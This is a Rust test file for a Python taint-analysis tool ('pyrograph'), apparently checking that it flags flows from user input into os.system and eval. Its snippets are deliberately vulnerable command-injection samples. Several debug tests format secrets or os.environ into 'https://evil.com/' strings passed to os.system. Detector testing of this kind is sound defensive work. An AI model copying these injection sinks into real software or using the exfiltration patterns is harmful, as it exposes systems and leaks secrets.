#![cfg(feature = "python")]
use pyrograph::{analyze, parse::parse_python};
fn assert_detects(name: &str, source: &str) {
let graph = parse_python(source, &format!("{name}.py")).unwrap();
let findings = analyze(&graph).unwrap();
assert!(!findings.is_empty(), "expected finding for {name}: {findings:?}");
}
fn assert_clean(name: &str, source: &str) {
let graph = parse_python(source, &format!("{name}.py")).unwrap();
let findings = analyze(&graph).unwrap();
assert!(findings.is_empty(), "unexpected finding for {name}: {findings:?}");
}
#[test]
fn tp_import_alias_system() {
assert_detects("tp_import_alias_system", "import os as o\ncmd = input()\no.system(cmd)\n");
}
#[test]
fn tp_from_import_alias_system() {
assert_detects("tp_from_import_alias_system", "from os import system as s\ncmd = input()\ns(cmd)\n");
}
#[test]
fn tp_with_open_fstring_system() {
assert_detects(
"tp_with_open_fstring_system",
"import os\nwith open('x') as f:\n data = f.read()\ncmd = f'echo {data}'\nos.system(cmd)\n",
);
}
#[test]
fn tp_list_comp_system() {
assert_detects(
"tp_list_comp_system",
"import os\ndata = input()\nitems = [x for x in data]\nos.system(items[0])\n",
);
}
#[test]
fn tp_fstring_system() {
assert_detects(
"tp_fstring_system",
"import os\nsecret = input()\ncmd = f'echo {secret}'\nos.system(cmd)\n",
);
}
#[test]
fn fp_fstring_sanitized() {
assert_clean(
"fp_fstring_sanitized",
"import os\nsecret = input()\nsafe = int(secret)\ncmd = f'echo {safe}'\nos.system(cmd)\n",
);
}
#[test]
fn tp_kwargs_interprocedural() {
assert_detects(
"tp_kwargs_interprocedural",
"import os\ndef run(*, cmd):\n os.system(cmd)\npayload = input()\nkwargs = {'shell': True}\nrun(cmd=payload, **kwargs)\n",
);
}
#[test]
fn tp_decorator_sink() {
assert_detects(
"tp_decorator_sink",
"from flask import request\n@eval(request.form['code'])\ndef handler(): pass\n",
);
}
#[test]
fn tp_nested_decorator_sink() {
assert_detects(
"tp_nested_decorator_sink",
"from flask import request\n@app.route('/')\n@eval(request.form['code'])\ndef handler(): pass\n",
);
}
#[test]
fn tp_try_except_input_system() {
assert_detects(
"tp_try_except_input_system",
"import os\ntry:\n pass\nexcept:\n cmd = input()\n os.system(cmd)\n",
);
}
#[test]
fn tp_try_except_raise_flow() {
assert_detects(
"tp_try_except_raise_flow",
"try:\n raise input()\nexcept Exception as e:\n eval(e)\n",
);
}
#[test]
fn debug_format_taint() {
let source = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(secret)
os.system(cmd)
"#;
let graph = parse_python(source, "test.py").unwrap();
let findings = analyze(&graph).unwrap();
eprintln!("findings count: {}", findings.len());
for node in graph.nodes() {
eprintln!(" {} {:?} {:?} {:?}", node.id, node.kind, node.name, node.label);
}
for (from, kind) in graph.edges_from(0) {
eprintln!(" edge from 0 -> {} {:?}", from, kind);
}
}
#[test]
fn debug_format_taint2() {
let source = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(secret)
os.system(cmd)
"#;
let graph = parse_python(source, "test.py").unwrap();
let findings = analyze(&graph).unwrap();
eprintln!("findings count: {}", findings.len());
for f in &findings {
eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
}
for node in graph.nodes() {
for (to, kind) in graph.edges_from(node.id) {
eprintln!("edge: {} -> {} {:?}", node.id, to, kind);
}
}
}
#[test]
fn debug_fstring_taint2() {
let source = r#"
secret = input()
cmd = f'https://evil.com/{secret}'
eval(cmd)
"#;
let graph = parse_python(source, "test.py").unwrap();
let findings = analyze(&graph).unwrap();
eprintln!("fstring findings count: {}", findings.len());
for f in &findings {
eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
}
for node in graph.nodes() {
for (to, kind) in graph.edges_from(node.id) {
eprintln!("edge: {} -> {} {:?}", node.id, to, kind);
}
}
}
#[test]
fn debug_format_locals() {
let source = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(**locals())
os.system(cmd)
"#;
let graph = parse_python(source, "test.py").unwrap();
let findings = analyze(&graph).unwrap();
eprintln!("format(**locals) findings count: {}", findings.len());
for f in &findings {
eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
}
for node in graph.nodes() {
eprintln!(" {} {:?} {:?}", node.id, node.kind, node.name);
for (to, kind) in graph.edges_from(node.id) {
eprintln!(" edge -> {} {:?}", to, kind);
}
}
}
#[test]
fn debug_fstring_complex() {
let source = r#"
import os
obj = type('X', (), {})()
obj.secret = input()
cmd = f'https://evil.com/{obj.secret}'
os.system(cmd)
"#;
let graph = parse_python(source, "test.py").unwrap();
let findings = analyze(&graph).unwrap();
eprintln!("fstring complex findings count: {}", findings.len());
for f in &findings {
eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
}
}
#[test]
fn debug_format_os_environ() {
let source = r#"
import os
cmd = 'https://evil.com/{}'.format(**os.environ)
os.system(cmd)
"#;
let graph = parse_python(source, "test.py").unwrap();
let findings = analyze(&graph).unwrap();
eprintln!("format(**os.environ) findings count: {}", findings.len());
for f in &findings {
eprintln!("finding: source={} sink={} path={:?}", f.source, f.sink, f.path);
}
for node in graph.nodes() {
eprintln!(" {} {:?} {:?}", node.id, node.kind, node.name);
for (to, kind) in graph.edges_from(node.id) {
eprintln!(" edge -> {} {:?}", to, kind);
}
}
}